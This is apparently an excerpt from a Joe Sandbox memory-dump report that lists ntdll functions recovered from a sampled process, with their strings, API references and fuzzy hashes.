API String ID: 3446177414-0
Opcode ID: eeb68271b3e357729c99a56c5b71558ad1306aad8d89a4ca84f6fab77740f9ad
Instruction ID: 9c6328c1fd70da4d7a32bc1b575cfd67d5a8464f7bb7467bea29e0285f22db2e
Opcode Fuzzy Hash: eeb68271b3e357729c99a56c5b71558ad1306aad8d89a4ca84f6fab77740f9ad
Instruction Fuzzy Hash: 4FF1F772E00B158BCB08CF69CAA167EBFF6EF9D210719816DD456DB381E634EA41CB50

Function 225204E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 2252055E

Strings

kLsE, xrefs: 22520540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2252063D

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 1a48992965483ceda17ff4cd9a0c3cb7a52061e94da7cd9e5abf868be76e562b
Instruction ID: 848efaa99ae07b6831da253a4f30cc2c360d73fb76196e1467103f144c558f73
Opcode Fuzzy Hash: 1a48992965483ceda17ff4cd9a0c3cb7a52061e94da7cd9e5abf868be76e562b
Instruction Fuzzy Hash: 7E51B171605B428FC314DF64C6447A7BBE4AF94304F108A3EEA9A872C5E734EA45CF92

Function 2252A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 2252A3F7
LdrResFallbackLangList Exit, xrefs: 2252A3FF
LdrResFallbackLangList Enter, xrefs: 2252A3EF
8, xrefs: 2252A3E7

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 48f8321dd8c342e09cfebdaad07156ba9730eb16c96f4f3df4a5529d914f33de
Instruction ID: 1e9b8463250b6ed9b596977a8a91db12b1a9ed853c06b2d3b66327d317bd88de
Opcode Fuzzy Hash: 48f8321dd8c342e09cfebdaad07156ba9730eb16c96f4f3df4a5529d914f33de
Instruction Fuzzy Hash: D5C16C756087828FE711CF14C640B5ABBE4FF84708F008A6AF995DB2D1E778DA45CB92

Function 22558402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 22558422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2255855E
@, xrefs: 22558591
minkernel\ntdll\ldrinit.c, xrefs: 22558421

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: d3ecd4be42071b00d8c6acca79592373462cd69d0943eaa71d8bca759418edd8
Instruction ID: f84b613417c5ec9cb07fd8dab375b6ad0baaf965171a14999af99c7944e95665
Opcode Fuzzy Hash: d3ecd4be42071b00d8c6acca79592373462cd69d0943eaa71d8bca759418edd8
Instruction Fuzzy Hash: DF917D71508345AFD721CF61C984F6BBBE9EF84744F80892EFA84D2151E738DA94CB62

Function 2255273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 225921DE
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 225921D9, 225922B1
.Local, xrefs: 225528D8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 225922B6

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 21f9083149fdd590c3398d99de1daf8736e9fba7c9d4818d2f566fb5ca84a35f
Instruction ID: 5480660730a53450eaf6d4668c4b65e786a50caae0c9059e6b3576e88074d181
Opcode Fuzzy Hash: 21f9083149fdd590c3398d99de1daf8736e9fba7c9d4818d2f566fb5ca84a35f
Instruction Fuzzy Hash: 0CA165319013299BDB25CFA4D984B99B7B1AF58318F2085EAD908EB351D7B0DED0CF90

Function 22554AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 22593437
RtlDeactivateActivationContext, xrefs: 22593425, 22593432, 22593451
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 22593456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 2259342A

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 0e9f3025f51673b477ff9425093c601fd81b73b151efcc54e18a5873487991e7
Instruction ID: 2553840a06283795bb9d6134e30953c1b974ff9c5d31227a9d36c2aae19bf3bc
Opcode Fuzzy Hash: 0e9f3025f51673b477ff9425093c601fd81b73b151efcc54e18a5873487991e7
Instruction Fuzzy Hash: 31612632604B11EBC712CF18C985F2ABBE5EF85B64F15C66AE958AF240D734E910CBD1

Function 225264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 2258106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 22580FE5
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 225810AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 22581028

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: e986d5746a042f974bedf68044903105bc6d7c1bdd0fa5c3f585bfeba3ed5fd8
Instruction ID: 76cad929eb58477892d392cc21ace91e8bc73cdc5ddece3c5f9532463cac88e1
Opcode Fuzzy Hash: e986d5746a042f974bedf68044903105bc6d7c1bdd0fa5c3f585bfeba3ed5fd8
Instruction Fuzzy Hash: E471AE71A047049FD720CF14C985B9B7FACEF95764F808668FA488B286D774D988CBD2

Function 225329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 22533264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 2253327D
HEAP[%wZ]: , xrefs: 22533255

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: df4898e5c92f2cdbe6c9705abdfbab4ba339e96562375ff1356906c0f3122f8d
Instruction ID: b7a79780ff22d0379062f80415e9a59af58507f1eb19455340e96143fadc1961
Opcode Fuzzy Hash: df4898e5c92f2cdbe6c9705abdfbab4ba339e96562375ff1356906c0f3122f8d
Instruction Fuzzy Hash: 6092BB71A04788AFDB16CF68C540BAEBBF1FF88304F14D599E849AB291D774A941CF90

Function 22546962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 22546C24
, xrefs: 2258CA51

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 22cad7b83af48ed87bf1cb0a8520f94597ce7ca2622bf8bc6b5bd2405a4c8009
Instruction ID: 189be49ecefaf9ee8d2f43b03f0929a549933782eb1792bd22471477d42ec863
Opcode Fuzzy Hash: 22cad7b83af48ed87bf1cb0a8520f94597ce7ca2622bf8bc6b5bd2405a4c8009
Instruction Fuzzy Hash: 54C27A71A093819FD729CF24C980BABBBE5EFC8754F04C92DE98987241DB74D944CB92

Function 2251A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 2257C2E6
\??\, xrefs: 2257C1E4
UseFilter, xrefs: 2251A1C1

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 2d3b50838928710cc3bf3bb53c9aadc9ee2689ea7e7756cdea8204a751f3f867
Instruction ID: 463f291e51b41451ea6d7d33096fbaf90914919f8091ded750edc5df609ea1d3
Opcode Fuzzy Hash: 2d3b50838928710cc3bf3bb53c9aadc9ee2689ea7e7756cdea8204a751f3f867
Instruction Fuzzy Hash: E3A18F719513299BEB21CF64CD88BE9B7B8EF44705F1081EAE908E7250E7359E84CF50

Function 22530A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 2258534D
HEAP: , xrefs: 22585342
HEAP[%wZ]: , xrefs: 22585335

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 6c3e129e9197743368bd4498868b808eb8dd384808c0eb81badc5526a0c17832
Instruction ID: 06cba954b6d202b94bf2fd8dbd23d06e3b715c96ff2c55ac911b13f3a7ddb7ee
Opcode Fuzzy Hash: 6c3e129e9197743368bd4498868b808eb8dd384808c0eb81badc5526a0c17832
Instruction Fuzzy Hash: 0D61E370A00305DFD71ACF28C590B9ABBE1FF45308F15D95AE8498F296D7B0E981CB91

Function 225DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 225DC212
@, xrefs: 225DC1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 225DC1C5

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 3c6732d78caaa4b065577fb923556672a7138046fbc626ec8e0e1db28c3c5df6
Instruction ID: 160cf6641687d3fe95a3ce56657a95ef58017f6cd18125d9b6ccbf943425558c
Opcode Fuzzy Hash: 3c6732d78caaa4b065577fb923556672a7138046fbc626ec8e0e1db28c3c5df6
Instruction Fuzzy Hash: FE415072E00309EBDB01CBD8C991FEEBBB9AB54B06F10816AE645F7254D774DA44CB90

Function 225B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 225B4225
LdrpResValidateFilePath Enter, xrefs: 225B4160
LdrpResValidateFilePath Exit, xrefs: 225B4172

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: c00aa509f6c8d18d1231a09e63a66943d97a7e2a1436f3ce5afe051e514a8f02
Instruction ID: bf876fdc1ac2f21abb2ba01c79278137c1e1cba827ce47e378cefe9a17543882
Opcode Fuzzy Hash: c00aa509f6c8d18d1231a09e63a66943d97a7e2a1436f3ce5afe051e514a8f02
Instruction Fuzzy Hash: CD41D332D007589BEB22CBA4D960BADBBB8EFA5344F108569D901FF795DB34C901CB51

Function 2252A2C3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 2252A309
RtlpResUltimateFallbackInfo Enter, xrefs: 2252A2FB
PSO", xrefs: 2252A348

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: PSO"$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-4155116065
Opcode ID: 9c3be97a1ba5382de85a0c2014eda5e720458d3a2b2664c642d91520f73a24bc
Instruction ID: a2cf843c8c8f12a4b5a251fe379b006659a046dde9103270697f21e4656f1643
Opcode Fuzzy Hash: 9c3be97a1ba5382de85a0c2014eda5e720458d3a2b2664c642d91520f73a24bc
Instruction Fuzzy Hash: 8941AF31A15B85DBEB01CF69C640B5D7BB4FF94704F10C6A5E900DB2D2E6B9DA40CB51

Function 22530BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 22585449
HEAP: , xrefs: 2258543E
HEAP[%wZ]: , xrefs: 22585431

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: b1555c922bf629d5a63f3ef71ae302bf2cfd48c11bb49ecda2ddda38d0d3e0a2
Instruction ID: 4794699b5ccef23e1f31bbeeca54ee7cb225717282d631ce8a9106b3475faff2
Opcode Fuzzy Hash: b1555c922bf629d5a63f3ef71ae302bf2cfd48c11bb49ecda2ddda38d0d3e0a2
Instruction Fuzzy Hash: 58113331315301CFE709CB24C490FAAB7A2EF8071AF16D629E405DB265EB34E881CB52

Function 225A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 225A20F3
LdrpInitializationFailure, xrefs: 225A20FA
minkernel\ntdll\ldrinit.c, xrefs: 225A2104

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 5a0d23dc17ef837dde3523bf344966fee66e682c42bc52b3320168dfede8a6ea
Instruction ID: 841465f8e529620b1eb0da76bb3cf23410f3e0f9863484273d801902285da9e1
Opcode Fuzzy Hash: 5a0d23dc17ef837dde3523bf344966fee66e682c42bc52b3320168dfede8a6ea
Instruction Fuzzy Hash: DDF0C8356403086BE710D648CD93FAD37A8EF85758F608459FA00BB285D5F0A640C695

Function 225303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 22584D8A

Strings

#%u, xrefs: 22584D82

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 6fcc32849454bae3fb157787bb1a903dd80169b6e8f5b724287c3060d1fdd991
Instruction ID: 8a0693f91c37d48f49d6e5e6f829f60198e09bddd534c534609224563966a202
Opcode Fuzzy Hash: 6fcc32849454bae3fb157787bb1a903dd80169b6e8f5b724287c3060d1fdd991
Instruction Fuzzy Hash: AF713C71A003499FDB01CF98C991FAEBBF8FF58744F148465E904EB251E674EA41CBA1

Function 2254EBFC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

\a", xrefs: 2254ED00

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: \a"
API String ID: 0-3883912608
Opcode ID: 660e699d1a752347694f6a3aeed9bdbd25a35969c2a8d728175628956eaa3777
Instruction ID: 76076be2d3b021352505fbef714cfb158d9c006814d4ef08843a687af7788082
Opcode Fuzzy Hash: 660e699d1a752347694f6a3aeed9bdbd25a35969c2a8d728175628956eaa3777
Instruction Fuzzy Hash: FD41AF72A047019FD711CF24C980A1BBBE9FF88318F50992AEA56C7611EF75E984CB51

Function 225ACEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 225ACFBD

Strings

@, xrefs: 225ACF0A

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @
API String ID: 4062629308-2766056989
Opcode ID: e9d6c268f1024558dcf624506a8d4ddb8e2d78b9b1822d4af9a1b4945937e31c
Instruction ID: e3e8151d3855859f06f7bb5082dba6113cc4fb63e172abdb4b36f4d1a1dc6dc5
Opcode Fuzzy Hash: e9d6c268f1024558dcf624506a8d4ddb8e2d78b9b1822d4af9a1b4945937e31c
Instruction Fuzzy Hash: 62419B72901318DFCB219FA5C981AAEBBB8FF94704F00852AE905DB354EB34D941CB61

Function 225BAEB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 225BAFA4

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 225BAF2F

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-1911121157
Opcode ID: a2a0acd33557f74b3cb494b7583d45ff9d9ce599ead849dd86c34e97f06c77b6
Instruction ID: fb267697f04615c1b5b11d49a629c8f156f3bbccfdaa7ac582caa175c1856f80
Opcode Fuzzy Hash: a2a0acd33557f74b3cb494b7583d45ff9d9ce599ead849dd86c34e97f06c77b6
Instruction Fuzzy Hash: 9031F1B6A00744ABD701CF64CD49FAEBBB5EF88714F21C665FA0097688C738A840CB90

Function 225A892A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 225A895E

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 46eff28b25cb7f54ad4438366b05bcc454b27103e924999082c523b1668362b3
Instruction ID: fd00f8fa2ad2c451b2e1111d10f2a4803589c1ae37fd8fe2597dd43df5ffeb5d
Opcode Fuzzy Hash: 46eff28b25cb7f54ad4438366b05bcc454b27103e924999082c523b1668362b3
Instruction Fuzzy Hash: A70147332113009FE7245E11DDDDB5EBF65FFC5394B408528E64002655CB28B881C6D2

Function 22526EE0 Relevance: 3.1, APIs: 2, Instructions: 107timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 22526F79

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

Associated: 00000012.00000002.2375399703.0000000022619000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002261D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.2375399703.000000002268E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_224f0000_Tabsgivende.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: dd33aa422efae0e73f1acde18a3327f52c811739bd7dc9e9446681a503c4a815
Instruction ID: 45ac9542d127db0cc14e4afa96fd7efb3ac691274940e8fed716db0f01dce4c4
Opcode Fuzzy Hash: dd33aa422efae0e73f1acde18a3327f52c811739bd7dc9e9446681a503c4a815
Instruction Fuzzy Hash: 93416836601B46EFCB16CF25C984F5ABBA6FF85340F148555E90187AA1CB74ED60CB90

Function 2252A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 2252AA13
LdrResSearchResource Exit, xrefs: 2252AA25

Memory Dump Source

Source File: 00000012.00000002.2375399703.00000000224F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 224F0000, based on PE: true

